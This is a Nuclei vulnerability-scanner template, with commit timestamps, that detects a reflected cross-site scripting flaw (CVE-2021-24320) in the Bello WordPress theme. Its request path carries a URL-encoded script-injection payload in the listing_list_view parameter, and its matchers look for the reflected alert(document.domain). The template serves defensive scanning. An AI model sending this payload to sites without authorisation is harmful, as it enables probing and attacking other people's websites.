nuclei-templates/cves/2021/CVE-2021-24320.yaml

33 lines
1.3 KiB
YAML
Raw Normal View History

2021-07-15 03:38:35 +00:00
id: CVE-2021-24320
info:
name: Bello WordPress Theme < 1.6.0 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
2021-07-15 09:13:35 +00:00
description: The Bello - Directory & Listing WordPress theme before 1.6.0 did not properly sanitise and escape its listing_list_view, bt_bb_listing_field_my_lat, bt_bb_listing_field_my_lng, bt_bb_listing_field_distance_value, bt_bb_listing_field_my_lat_default, bt_bb_listing_field_keyword, bt_bb_listing_field_location_autocomplete, bt_bb_listing_field_price_range_from and bt_bb_listing_field_price_range_to parameter in ints listing page, leading to reflected Cross-Site Scripting issues.
2021-08-01 06:16:33 +00:00
reference: |
2021-08-01 06:14:14 +00:00
- https://m0ze.ru/vulnerability/%5B2021-03-21%5D-%5BWordPress%5D-%5BCWE-79%5D-Bello-WordPress-Theme-v1.5.9.txt
- https://wpscan.com/vulnerability/6b5b42fd-028a-4405-b027-3266058029bb
2021-07-15 03:38:35 +00:00
tags: cve,cve2021,wordpress,xss,wp-plugin
requests:
- method: GET
path:
2021-07-19 06:06:45 +00:00
- '{{BaseURL}}/listing/?listing_list_view=standard13%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
2021-07-15 03:38:35 +00:00
matchers-condition: and
matchers:
- type: word
words:
2021-07-19 06:06:45 +00:00
- "</script><script>alert(document.domain)</script>"
2021-07-15 03:38:35 +00:00
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200